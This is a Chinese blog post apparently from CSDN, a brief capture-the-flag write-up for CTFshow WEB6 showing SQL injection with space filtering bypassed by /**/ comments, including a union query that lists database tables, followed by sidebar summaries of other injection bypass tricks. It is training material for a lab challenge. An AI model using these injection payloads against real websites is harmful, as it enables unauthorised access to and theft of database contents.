[SQL注入]CTFshow-----WEB6(空格绕过)

最新推荐文章于 2024-04-30 04:08:20 发布
最新推荐文章于 2024-04-30 04:08:20 发布
阅读量298 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40470232/article/details/119082880
版权

sql注入的步骤:先查表再查字段后查数据
输入万能密码 1' #抓包发现报错
在这里插入图片描述
去掉之后发现正常,这我想到了空格绕过/**/
在这里插入图片描述
万能登陆密码登录
在这里插入图片描述

检测回显位置—得到回显位为2
在这里插入图片描述

查表,得表名flag,user
构造语句:select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()
在这里插入图片描述

查字段/列名,得列名’flag'
在这里插入图片描述
查数据
在这里插入图片描述

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sql注入-绕过过滤空格
MichealCurry1的博客
10-09 2690
空格可以用/**/,%20替换
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
SQL注入绕过空格
nihao_ma_的博客
05-07 1949
SQL注入空格绕过技巧
黑客常用SQL注入绕过技术总结!(冰河吐血整理,建议收藏)
最新发布
2401_84253037的博客
04-30 603
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。在使用盲注的时候,需要使用到substr(),mid(),limit。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。
[SQL注入]CTFSHOW-----WEB6(空格绕过
Y4tacker的博客
08-05 6038
首先,通过抓包发现这个报错 去掉空格后恢复正常,因此我们得想到用/**/绕过空格 万能登陆密码登录 检测回显位置—得到回显位为2 查表名 查列名 爆数据
20、绕过去除and、or、union select、空格sql注入
weixin_41489908的博客
12-10 1422
环境sqli-labs less 25 1、输入特殊字符,报错 http://192.168.1.121/sqli/Less-25/?id=1 2、单引号闭合 3、输入and、or都会被过滤,报错,输入||正常,所以可以判断是大小写过滤 http://192.168.1.121/sqli/Less-25/?id=1’ and 1=1 --+ http://192.168.1.121/sqli/...
mysql注入绕过空格过滤的方法
热门推荐
至臻求学,胸怀云月
04-05 2万+
SQL注入时,空格的使用是非常普遍的。比如,我们使用union来取得目标数据: http://www.xxx.com/index.php?id=1 and 0 union select null,null,null 上面的语句,在and两侧、union两侧、select的两侧,都需要空格。 1. 注释绕过空格 这是最基本的方法,在一些自动化SQL注射工具中,使用也十分普遍。在M
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 6: Apache 服务器配置 部署成功以后 Apache 会自动重启,访问地址(后面的路径就是输入的域名,跟文件路径一致):http://localhost/sqli-labs。 知识点 7: 初始化数据库 点击 Setup/reset Database for ...
第十七节 绕过剔除空格SQL注入-01
09-15
绕过剔除空格SQL注入Web应用安全中的一种常见攻击方式。SQL注入攻击是指攻击者将恶意的SQL代码注入到Web应用的数据库中,以获取或修改敏感数据。在本节课程中,我们将介绍绕过剔除空格SQL注入的基础知识、去除...
SQL注入-初入web安全-详细知识图谱
11-06
SQL注入初入Web安全详细知识图谱 SQL注入是一种常见的Web应用安全漏洞,指的是攻击者通过构造特殊的输入参数,来改变原始的SQL语句,使得数据库服务器执行恶意的SQL语句,从而达到非法访问或控制数据库的目的。SQL...
SQL注入绕过的技巧总结
09-09
主要给大家总结了一些关于SQL注入绕过的技巧,其中包括引号绕过、逗号绕过以及比较符(<,>)绕过,文中给出了详细的介绍和示例代码,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
CTF_ctfshow_web7_sql注入之过滤空格
weixin_54227009的博客
05-14 473
打开靶机 打开每一个列表,发现有一个id,所以为get传参 ok,找一下注入点 -2/**/union/**/select/**/1,2,3# 这里发现过滤了空格,所以直接用/**/代替空格进行绕过,发现回显点为2,3 下面开始查库吧! -2/**/union/**/select/**/1,database(),version();# 库名:web7 版本:10.3.18-MariaDB 查表: -2/**/union/**/select/**/1,gr...
生命在于学习——SQL注入绕过
易水哲的博客
08-17 9510
SQL注入绕过技术已经是一个老生常淡的内容了
SQL注入绕过技巧
whj_study的博客
12-18 2685
1.绕过空格(注释符/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,3 select * from users where id=8.0 select 1,2,3 2.括号绕过空格:   如..
sql注入常见绕过方法
ljlrookiebird的博客
09-05 3705
sql注入web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他没总结到了,小伙伴可以留言补充
sql注入绕过方法总结
nigo134的博客
06-17 2746
转至:sql注入绕过方法总结_huanghelouzi的博客-CSDN博客_sql绕过 我们希望用户输入的 id 的值,仅仅是一个字符串,传入数据库执行,但是当输入了: 2 or 1=1 时,其中的 or 1=1 是作为了 sql语句 来执行的。常用的注释符有 实例 大小写绕过 常用于 的正则对大小写不敏感的情况,一般都是题目自己故意这样设计。 例如:waf过滤了关键字,可以尝试使用等绕过。 内联注释绕过 内联注释就是把一些特有的仅在MYSQL上的语句放在 中,这样这些
【网络安全】SQL注入绕过技巧
Cairo_A的博客
12-08 715
在使用盲注的时候,需要使用到substr(),mid(),limit。or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。而括号的两端,可以没有多余的空格。(2)将 \' 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。
8-Web安全——SQL注入WAF绕过之and,or,空格
网络安全
06-03 4631
1. and和or绕过 and和or的作用: and关键字表示同时满足两个条件,例如测试字符型注入和数字型注入用到的and 1=1和and1=2两个条件语句。 or表示满足其中一个条件即可,例如报错注入时用到的or语句 下面是后台过滤and和or关键字的源代码: function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_repl.
sqli-labs实验指导手册
11-17
sqli-labs实验指导手册,通过搭建sqli-labs实验平台,对每一道题进行通关操作的讲解,帮助同学们学习和操作以及理解Sql注入的原理

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值